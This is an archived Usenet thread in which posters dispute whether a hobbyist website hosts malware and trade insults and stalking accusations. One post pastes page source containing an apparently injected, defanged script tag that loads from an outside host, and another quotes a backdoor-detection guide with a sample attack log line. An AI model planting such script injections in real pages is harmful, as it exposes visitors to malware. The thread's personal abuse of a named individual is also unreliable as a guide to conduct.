|
| If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. |
|
|||||||
|
|
Thread Tools | Rate Thread | Display Modes |
|
#61
June 2nd 17, 12:23 AM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
(OT) Oh dear! You really should *NOT* still be using Windows XP
On Thu, 1 Jun 2017 09:46:21 +0100, "David B."
wrote: On 31/05/2017 18:49, Shadow wrote: On Wed, 31 May 2017 15:23:09 +0100, "David B." wrote: On 31/05/2017 14:50, (PeteCresswell) wrote: Per David B.: I perceive that you have absolutely no idea that your Windows XP machine has *ALREADY* been compromised and co-opted into a huge Botnet. But wouldn't an AV app like Avast pick up on that? Sadly, not necessarily. That's MY understanding anyway. Are you speaking as a "security expert" I'm no expert, but I am more careful that you appear to be! ;-) http://tekrider.net/pages/david-brooks-stalker.php Not a good link to follow, Shadow! Perhaps this screenshot will help you understand *HOW* your computer became infected:- It did, thank you, show me why I was NOT infected, but you were.. As you know, the site you posted the "screenshot" (which I didn't try to download - if it was important, you would have posted in words, not as an image) was hacked. All those 404's you are getting ..... explained. Pr0N sites are safer. []'s -- Don't be evil - Google 2004 We have a new policy - Google 2012 
|
| Ads |
|
#62
June 2nd 17, 12:25 AM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On Thu, 1 Jun 2017 11:40:33 +0100, "David B."
wrote: http://tekrider.net/pages/david-brooks-stalker.php Not a good link to follow, Shadow! Sure it is. It accurately describes you. Probably why you'd prefer others not click on it. Especially since you failed to get it taken down and as a result, decided to attack the administrator, instead. *It's a BAD web site*! Here's the proof: No, a link is not proof of anything. What malware does the above site host ? []'s -- Don't be evil - Google 2004 We have a new policy - Google 2012
|
|
#63
June 2nd 17, 01:05 AM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
"David B." Thu, 01 Jun 2017 10:40:33 GMT in alt.2600, wrote:
*It's a BAD web site*! Here's the proof:- https://sitecheck.sucuri.net/results/www.tekrider.net Already examined your proof and posted my analysis results. Nothing bad about the website, but, if it helps, you exposed the sometimes glaring incompetence of sucuri. I've done further analysis since my original post. See below. Securi says YOU are wrong, Dustin! It's Sucuri. They are using scare mongering tactics with you. As well as contradicting themselves. a suspicious url (which I can't find in my local copy of tekrider or the online version when checked with firefox or wget) isn't malware by itself. A url alone can't actually be malware. What it points to, oth, could be. But, in this particular case, the code they claim is present, isn't. So, contrary to what you may think, they aren't saying I'm wrong, either. Suspicious does not equal malware. And, they consider the missing html source (I can't find it in my local copy or the online edition) suspicious ONLY because a piece of it's domain, or, the entire thing (I'm not sure which; didn't check; not sure if they publish their blacklist) is supposedly blacklisted by them. That doesn't automatically make it malware, either. wget tekrider.net --2017-06-01 19:41:47-- http://tekrider.net/ Resolving tekrider.net... 192.251.238.3 Connecting to tekrider.net|192.251.238.3|:80... connected. HTTP request sent, awaiting response... 302 Moved Temporarily Location: pages/index.php [following] --2017-06-01 19:41:47-- http://tekrider.net/pages/index.php Reusing existing connection to tekrider.net:80. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: `index.php' [ = ] 5,737 --.-K/s in 0.02s 2017-06-01 19:41:47 (227 KB/s) - `index.php' saved [5737] Verified the lines Sucuri thinks are present in the index.php using alleycode and notepad (not necessary, but, I like to be thorough for you) are not. Also verified the results with firefox: view-source:https://tekrider.net/pages/index.php So, that's three seperate ways of doing it, and, all three confirm, Sucuri is incorrect. Local mirrored copy (#1), wget (#2), firefox (#3) as I know you're a bit 'slow' concerning matters of a technical nature. Btw, the local image was done on the 29th of May. So much for them saying i'm wrong, David... ROFL! I'll let you know what you owe me for doing this for you, soon. They know their stuff, I'm sure! :-) Did you visit the following url, David? https://www.whitefirdesign.com/blog/...heir-services/ -- Nope, I can't go to hell. Satan still has a restraining order against me. https://tekrider.net/pages/david-brooks-stalker.php
|
|
#64
June 2nd 17, 01:05 AM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
"David B." Thu, 01 Jun 2017 10:40:33 GMT in alt.2600, wrote:
*It's a BAD web site*! Here's the proof:- https://sitecheck.sucuri.net/results/www.tekrider.net Already examined your proof and posted my analysis results. Nothing bad about the website, but, if it helps, you exposed the sometimes glaring incompetence of sucuri. I've done further analysis since my original post. See below. Securi says YOU are wrong, Dustin! It's Sucuri. They are using scare mongering tactics with you. As well as contradicting themselves. a suspicious url (which I can't find in my local copy of tekrider or the online version when checked with firefox or wget) isn't malware by itself. A url alone can't actually be malware. What it points to, oth, could be. But, in this particular case, the code they claim is present, isn't. So, contrary to what you may think, they aren't saying I'm wrong, either. Suspicious does not equal malware. And, they consider the missing html source (I can't find it in my local copy or the online edition) suspicious ONLY because a piece of it's domain, or, the entire thing (I'm not sure which; didn't check; not sure if they publish their blacklist) is supposedly blacklisted by them. That doesn't automatically make it malware, either. wget tekrider.net --2017-06-01 19:41:47-- http://tekrider.net/ Resolving tekrider.net... 192.251.238.3 Connecting to tekrider.net|192.251.238.3|:80... connected. HTTP request sent, awaiting response... 302 Moved Temporarily Location: pages/index.php [following] --2017-06-01 19:41:47-- http://tekrider.net/pages/index.php Reusing existing connection to tekrider.net:80. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: `index.php' [ = ] 5,737 --.-K/s in 0.02s 2017-06-01 19:41:47 (227 KB/s) - `index.php' saved [5737] Verified the lines Sucuri thinks are present in the index.php using alleycode and notepad (not necessary, but, I like to be thorough for you) are not. Also verified the results with firefox: view-source:https://tekrider.net/pages/index.php So, that's three seperate ways of doing it, and, all three confirm, Sucuri is incorrect. Local mirrored copy (#1), wget (#2), firefox (#3) as I know you're a bit 'slow' concerning matters of a technical nature. Btw, the local image was done on the 29th of May. So much for them saying i'm wrong, David... ROFL! I'll let you know what you owe me for doing this for you, soon. They know their stuff, I'm sure! :-) Did you visit the following url, David? https://www.whitefirdesign.com/blog/...heir-services/ -- Nope, I can't go to hell. Satan still has a restraining order against me. https://tekrider.net/pages/david-brooks-stalker.php
|
|
#65
June 2nd 17, 10:33 AM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On 01/06/17 23:16, Beauregard T. Shagnasty wrote:
David B. wrote: On 01/06/2017 19:11, Beauregard T. Shagnasty claimed .... You've added those extra lines. *I* most certainly have *NOT* added any extra lines! THAT is what MALWARE does! Then those "tools" (of which you know nothing) are the malware and inserted it on their own. The code does NOT exist on my page. The problem I have with believing you is that your site looks somewhat different dependent on whether I connect to it directly or use a VPN. Can you explain that, 'bts'? May I also refer you to this post? Message-ID: -- ..
|
|
#66
June 2nd 17, 10:57 AM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On 01/06/2017 20:16, Sycho wrote:
I thought I overheard FrozenNorth say this in alt.2600 on Thu, 1 Jun 2017 14:37:50 -0400 : On 2017-06-01 2:22 PM, David B. wrote: On 01/06/2017 19:11, Beauregard T. Shagnasty claimed .... You've added those extra lines. *I* most certainly have *NOT* added any extra lines! THAT is what MALWARE does! ;-) I just checked, the site is clean, it appears that BD has the malware. lol The shameless **** is at it again with his cyber stalking. And like always, he gets slapped down like the bad doggie he is. As I'm sure you are aware, there are a number of ports open on the Tekrider web site. I wouldn't be at all surprised to learn that YOU are responsible for the offending script being added to the site as I have described. You can see it clearly here - line 86:- Header returned by request for: http://tekrider.net/ - 192.251.238.3 HTTP/1.1 302 Moved Temporarily Date: Wed, 31 May 2017 13:56:17 GMT Server: Apache X-Powered-By: PHP/5.6.23 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 The location line in the header above has redirected the request to: pages/index.php ( If this redirect is not what you expected SEE: Redirects. for some tips on clearing redirects.) HTTP/1.1 200 OK Date: Wed, 31 May 2017 13:56:17 GMT Server: Apache X-Powered-By: PHP/5.6.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT ---------------- 1981?!!* Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: tekrider=3db2bc9e1ef897e2c4b4fc9a072f901d; path=/ Last-Modified: Tue, 24 Nov 2015 13:21:45 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Content that was returned by your request for the URL: http://tekrider.net/ Note: Content displayed is from the redirect location, the URL pages/index.php 1: !DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" 2: "http://www.w3.org/TR/html4/strict.dtd" 3: html lang="en-US" 4: head 5: title tekrider.net - Welcome to Tekrider.net /title 6: meta http-equiv="content-style-type" content="text/css" 7: meta http-equiv="language" content="english" 8: meta http-equiv="dialect" content="us" 9: meta http-equiv="window-target" content="_top" 10: meta name="author" content="Createk Software" 11: meta name="description" content="tekrider.net" 12: meta name="keywords" content="tekrider.net" 13: meta name="robots" content="all" 14: meta http-equiv="content-type" content="text/html; charset=UTF-8" 15: meta http-equiv="content-style-type" content="text/css" 16: link type="text/css" rel="stylesheet" href="../style/tekrider.css" media="screen" 17: link type="text/css" rel="stylesheet" href="../style/tekprint.css" media="print" 18: link rel="shortcut icon" href="../system/favicon.ico" type="image/vnd.microsoft.icon" 19: link rel="icon" href="../system/favicon.ico" type="image/vnd.microsoft.icon" 20: !-- if you don't see the favicon, your browser is at fault -- 21: sc​ript type="text/javascript" 22: if (top.location != location) 23: // Sorry, not in YOUR frame 24: top.location.href = document.location.href ; 25: / sc​ript 26: style type='text/css' 27: #counter { width: 95%; margin-top: 2em; } 28: .cnt span { 29: background-color: #000; 30: border-top: 2px outset #d0d0d0; 31: border-left: 2px outset #d0d0d0; 32: border-right: 2px outset #a9a9a9; 33: border-bottom: 2px outset #a9a9a9; 34: color: #32cd32; 35: font-size:175%; 36: letter-spacing: 0.20em; 37: margin: 0 -0.2em 0 0; 38: padding: 0 0.2em 0 0.5em; 39: width: 1.1em; 40: } 41: .brooks {color: red; font-size: 3em;} 42: .boater { border-style: dotted; padding: .25em;} 43: /style 44: /head 45: body 47: div id='boxbanner' a id='top' /a tekrider.net /div 48: div class='ahem' 49: You may go directly to a title='Navigate' href='#themenu' the navigation menu /a after the content. 50: /div 51: div id='boxcontent' 52: h1 http://tekrider.net/ /h1 53: p 15 April, 2008: Welcome to the home of strong Beauregard T. Shagnasty's Playpen. /strong 54: /p 55: p class='boater' style='font-size:115%;' Note that strong class='cveryhot' Internet Stalker DAVID BROOKS /strong of Devon, UK 56: now has his own personal web page: br 57: a href='david-brooks-stalker.php' http://tekrider.net/pages/david-brooks-stalker.php /a /p p Why strong tekrider /strong ? Well, it was available, while techrider 58: was not; that domain seems to belong to a young man in Oslo, though there is only a 59: parking page at this writing. Oh, and my spouse says "Tek" is modern Nerdic geek-speak. img class='noborder' src='../system/smiley.gif' alt='' height='16' width='16' Note also that 60: ​t​e​k​r​i​d​e​r​. strong em c​o​m /em /strong 61: belongs to a fellow in Ontario, Canada who sells snowmobile clothing. No relation... 62: /p 63: p I have been a motorcycle rider for about 56 years, and a technical guy for all 64: of my employed life, but I am now retired. I have ridden somewhere a bit over a 65: half-million miles on two wheels. /p 66: p We all see a lot of web pages with visitor or hit counters on them. So why should I 67: skip that normally-useless bit of fluff? Therefo /p 69: div id='counter' 70: span class='imgright' img src='../system/webmaster.jpg' alt='Beau' title='Beau' height='105' width='160' 71: br Beauregard T. Shagnasty /span p strong You are visitor number /strong /p 72: p class='cnt' span 4,861,472 /span /p 73: p strong since yesterday. /strong /p 74: /div 75: div class='clearme' /div 76: div 77: p Other web sites written and maintained by this author: /p 78: ul 79: li a href=' http://fingerlakesbmw.org/' http://www.fingerlakesbmw.org img class='noborder' src='../system/offsite.png' alt='↗' title='External Site: Right-Click and Open in New Tab/Window' height='10' width='10' /a : Finger Lakes BMW Club /li 80: li a href=' http://freezeblock.com/' http://www.freezeblock.com img class='noborder' src='../system/offsite.png' alt='↗' title='External Site: Right-Click and Open in New Tab/Window' height='10' width='10' /a : Freezeblock Ice Dam Solutions /li 81: li class='txttiny' There are a couple of others, but the clients choose not to be listed here. /li 82: /ul 83: /div 84: p class='pcenter' img class='noborder' src='../system/bluefish.png' title='Made with Bluefish' alt='Bluefish Editor' height='57' width='103' /p 85: !-- [if IE] 86: sc​ript type="text/javascript" src=hxxp://windows-web-browsers.co.cc/alert/" 87: / sc​ript 88: !-- [endif]-- 89: div IE sc​ript here /div 92: /div 94: div class="ahem" 95: hr 96: /div 97: div id="boxnav" !-- Begin menu -- 98: ul 99: li img src='../system/mhome.gif' alt='' a href='../pages/index.php' Home /a /li 100: li img src='../system/mopen.gif' alt='' a href='../html/index.php' HTML /a /li 101: li img src='../system/mopen.gif' alt='' a href='../pages/faq.php' FAQ /a /li 102: li img src='../system/mopen.gif' alt='' a href='../general/index.php' General /a /li 103: li img src='../system/mopen.gif' alt='' a href='../pages/about.php' About /a /li 104: li img src='../system/mopen.gif' alt='' a href='../pages/tkncontact.php' Contact Me /a /li 105: /ul 106: div class="pcenter" img class="imgpad" src="../system/roundel.gif" title="BMW Roundel" alt="BMW Roundel" width="38" height="38" 107: /div 108: /div !-- End menu -- 110: div id="boxfooter" 111: span class='imgleft' 112: img class='noborder noprint' src='../system/ubuntufooter100.png' alt='Ubuntu Logo' title='Ubuntu Logo' height='100' width='100' 113: /span 114: div class='ahem' br br hr /div 115: p Copyright © 1997-2017 Tekrider.net. All rights reserved. br 116: span class='noprint' a class='flink' title='Use the handy form' href='../pages/tkncontact.php' Contact me /a if you have a comment about anything. br 117: It's Wednesday the 31st of May at 9:56 in my neighborhood. br 118: /span /p 119: /div 120: /body 121: /html = HTH :-) -- "The important thing is not to stop questioning." - Albert Einstein
|
|
#67
June 2nd 17, 02:14 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On Fri, 2 Jun 2017 10:57:06 +0100, "David B."
wrote: On 01/06/2017 20:16, Sycho wrote: I thought I overheard FrozenNorth say this in alt.2600 on Thu, 1 Jun 2017 14:37:50 -0400 : On 2017-06-01 2:22 PM, David B. wrote: On 01/06/2017 19:11, Beauregard T. Shagnasty claimed .... You've added those extra lines. *I* most certainly have *NOT* added any extra lines! THAT is what MALWARE does! ;-) I just checked, the site is clean, it appears that BD has the malware. lol The shameless **** is at it again with his cyber stalking. And like always, he gets slapped down like the bad doggie he is. As I'm sure you are aware, there are a number of ports open on the Tekrider web site. http://tekrider.net/pages/david-brooks-stalker.php There are a "number of ports open" on ALL websites, moron. They wouldn't be websites otherwise. []'s -- Don't be evil - Google 2004 We have a new policy - Google 2012
|
|
#68
June 2nd 17, 03:03 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
David Brooks STALKER, posting as "Anonymous" wrote:
On 01/06/17 23:16, Beauregard T. Shagnasty wrote: David B. wrote: On 01/06/2017 19:11, Beauregard T. Shagnasty claimed .... You've added those extra lines. *I* most certainly have *NOT* added any extra lines! THAT is what MALWARE does! Then those "tools" (of which you know nothing) are the malware and inserted it on their own. The code does NOT exist on my page. The problem I have with believing you is that your site looks somewhat different dependent on whether I connect to it directly or use a VPN. Can you explain that, 'bts'? Of course I can. It's because you are a STALKER. And you *are* a STALKER, having accessed the important pages on my web site more than *135* times in the last few days. -- -bts
|
|
#69
June 2nd 17, 03:08 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On 02/06/2017 14:14, Shadow wrote:
On Fri, 2 Jun 2017 10:57:06 +0100, "David B." wrote: On 01/06/2017 20:16, Sycho wrote: I thought I overheard FrozenNorth say this in alt.2600 on Thu, 1 Jun 2017 14:37:50 -0400 : On 2017-06-01 2:22 PM, David B. wrote: On 01/06/2017 19:11, Beauregard T. Shagnasty claimed .... You've added those extra lines. *I* most certainly have *NOT* added any extra lines! THAT is what MALWARE does! ;-) I just checked, the site is clean, it appears that BD has the malware. lol The shameless **** is at it again with his cyber stalking. And like always, he gets slapped down like the bad doggie he is. As I'm sure you are aware, there are a number of ports open on the Tekrider web site. http://tekrider.net/pages/david-brooks-stalker.php There are a "number of ports open" on ALL websites, moron. They wouldn't be websites otherwise. []'s Oops! I did, of course, mean that there a open ports on the SERVER used by 'bts'. One can check that with NMAP. :-) -- The only people who make a difference are the people who believe they can.
|
|
#70
June 2nd 17, 03:20 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On 02/06/2017 01:05, Diesel wrote:
Did you visit the following url, David? https://www.whitefirdesign.com/blog/...heir-services/ Yes, I did. Most interesting, Dustin. Thank you. :-) I reviewed the web site for a while ..... but couldn't find the page which you provided. :-( https://www.whitefirdesign.com/blog/page/3/?s=Securi -- David B.
|
|
#71
June 2nd 17, 05:49 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On 02/06/2017 15:03, Beauregard T. Shagnasty, a GOAT LOVER, said...
On 01/06/17 23:16, Beauregard T. Shagnasty wrote: David B. wrote: On 01/06/2017 19:11, Beauregard T. Shagnasty claimed .... You've added those extra lines. *I* most certainly have *NOT* added any extra lines! THAT is what MALWARE does! Then those "tools" (of which you know nothing) are the malware and inserted it on their own. The code does NOT exist on my page. The problem I have with believing you is that your site looks somewhat different dependent on whether I connect to it directly or use a VPN. Can you explain that, 'bts'? Of course I can. It's because you are a STALKER. And you *are* a STALKER, having accessed the important pages on my web site more than *135* times in the last few days. In reality, I have been INVESTIGATING - particularly folk who have malware on their web sites - like *YOU* have! I'm so pleased that, at last, you have been looking through your server logs! :-) I hope it didn't take up too much time. = *Finding a website backdoor*. Frequently if a hacker gets access to your website they will install a "backdoor" designed to allow them to hack your site again even after you've cleaned up the site, repaired the vulnerability that allowed them to hack the site, changed passwords, updated CMS/themes/ plugins, installed security plugins, etc. Until it is found and removed a "backdoor" is going to provide the hacker with access to your site. Typically a backdoor script is going to be called from a browser like any other web page, although on occasion I have seen them run from a chron. The script gives the hacker a web page interface where they can download and upload files, view or modify files, create directories, change file/folder permissions, basically it allows them to manage the site using PHP's ability to read and write files and pass operating system commands through to the operating system. Backdoors can be difficult to find because they are usually hidden in files that are already part of the site or uploaded as new files with innocent looking names, often in a directory with many files in it. Backdoors can range from a single line of code to lengthy files that provide the hacker the equivalent of a Control Panel on your site. There are some examples of common backdoors at Examples of website "backdoors". Start by checking your access logs One way to find these scripts is by searching website access logs for suspicious log entries generated when the hacker uses the scripts to modify site files. Here is a good example, from an Apache HTTP log, of a backdoor script in actual use by a hacker, to edit the /public_html/.htaccess file: xxx.xxx.xxx.xxx - - [dd/mm/yyyy:hh:mm:ss -0700] "GET /path/footer.inc.php?act=edit&file=/home​/account/public_html/.htaccess HTTP/1.1" 200 4795 "http://website/path/footer.inc.php?act=filemanager" "Mozilla/5.0..." footer.inc.php is the innocently-named file containing the backdoor script. Note: the "act"(action)=edit and file=.htaccess. The backdoor has a built-in file editor. The referrer (previous page visited) was the same backdoor, which also has a built-in file manager. Nobody should be able to edit your .htaccess file from a web page! A log line like this is a huge warning flag, and points directly to the file where the backdoor script is hidden. The above example suggests a few obvious things to search for in your log file: htaccess -- Unless you write articles about .htaccess and the word is in your search-engine-friendly file-name URLs, there is no reason for the word htaccess to appear in your HTTP access logs. act=edit action=edit From the example above, and a reasonable variation. filemanager -- Another word that probably won't normally appear in your log file. If you use legitimate web-interface editors like CKEditor or TinyMCE, they might conceivably produce log lines like this when you edit files yourself, but the pages being called as seen in your log file should be recognizable as scripts belonging to those editors, not weird names like footer.inc.php. Suspicious GET and/or Post variables -- Parameter names that you do not use on your site and parameters that contain long strings of seemingly random characters. = Ref: https://aw-snap.info/articles/find-backdoor.php = My boater friend said I should send you something appropriate as a reward. How about this? https://www.youtube.com/watch?v=miHbhcklHTk Do you like it? -- The only people who make a difference are the people who believe they can.
|
|
#72
June 2nd 17, 07:06 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
David B. STALKER wrote:
On 02/06/2017 15:03, Beauregard T. Shagnasty said... Of course I can. It's because you are a STALKER. And you *are* a STALKER, having accessed the important pages on my web site more than *135* times in the last few days. In reality, I have been INVESTIGATING - No, you have been STALKING. particularly folk who have malware on their web sites - like *YOU* have! There is NO malware on my web site. I know this for a fact and you do not. I'm so pleased that, at last, you have been looking through your server logs! :-) I hope it didn't take up too much time. No time was spent with my server logs. There are other ways... -- -bts
|
|
#73
June 2nd 17, 07:22 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On 2017-06-02 2:06 PM, Beauregard T. Shagnasty wrote:
David B. STALKER wrote: On 02/06/2017 15:03, Beauregard T. Shagnasty said... Of course I can. It's because you are a STALKER. And you *are* a STALKER, having accessed the important pages on my web site more than *135* times in the last few days. In reality, I have been INVESTIGATING - No, you have been STALKING. particularly folk who have malware on their web sites - like *YOU* have! There is NO malware on my web site. I know this for a fact and you do not. I'm so pleased that, at last, you have been looking through your server logs! :-) I hope it didn't take up too much time. No time was spent with my server logs. There are other ways... The only logs BD knows about are the things that come out of his fat drunken ass every morning. -- Froz....
|
|
#74
June 2nd 17, 10:29 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On 02/06/2017 19:22, FrozenNorth wrote:
On 2017-06-02 2:06 PM, Beauregard T. Shagnasty wrote: David B. STALKER wrote: On 02/06/2017 15:03, Beauregard T. Shagnasty said... Of course I can. It's because you are a STALKER. And you *are* a STALKER, having accessed the important pages on my web site more than *135* times in the last few days. In reality, I have been INVESTIGATING - No, you have been STALKING. particularly folk who have malware on their web sites - like *YOU* have! There is NO malware on my web site. I know this for a fact and you do not. I'm so pleased that, at last, you have been looking through your server logs! :-) I hope it didn't take up too much time. No time was spent with my server logs. There are other ways... The only logs BD knows about are the things that come out of his fat drunken ass every morning. You are so very rude, ******! https://sitecheck.sucuri.net/results/tekrider.net MALWARE RIDDEN SITE!
|
|
#75
June 2nd 17, 10:47 PM
posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
|
|||
|
|||
|
(OT) Oh dear! You really should *NOT* still be using Windows XP
On 02/06/2017 19:06, Beauregard T. Shagnasty wrote:
David B. STALKER wrote: On 02/06/2017 15:03, Beauregard T. Shagnasty said... Of course I can. It's because you are a STALKER. And you *are* a STALKER, having accessed the important pages on my web site more than *135* times in the last few days. In reality, I have been INVESTIGATING - No, you have been STALKING. You make it sound as if my investigations have been unsavory. They are not! :-) particularly folk who have malware on their web sites - like *YOU* have! There is NO malware on my web site. I know this for a fact and you do not. Your site is booby-trapped! I'm so pleased that, at last, you have been looking through your server logs! :-) I hope it didn't take up too much time. No time was spent with my server logs. There are other ways... My boater friend said I should send you something appropriate as a reward. How about this? https://www.youtube.com/watch?v=miHbhcklHTk *Do you like it*? -- "Do something wonderful, people may imitate it." (Albert Schweitzer)
|
| Thread Tools | |
| Display Modes | Rate This Thread |
|
|
Linear Mode
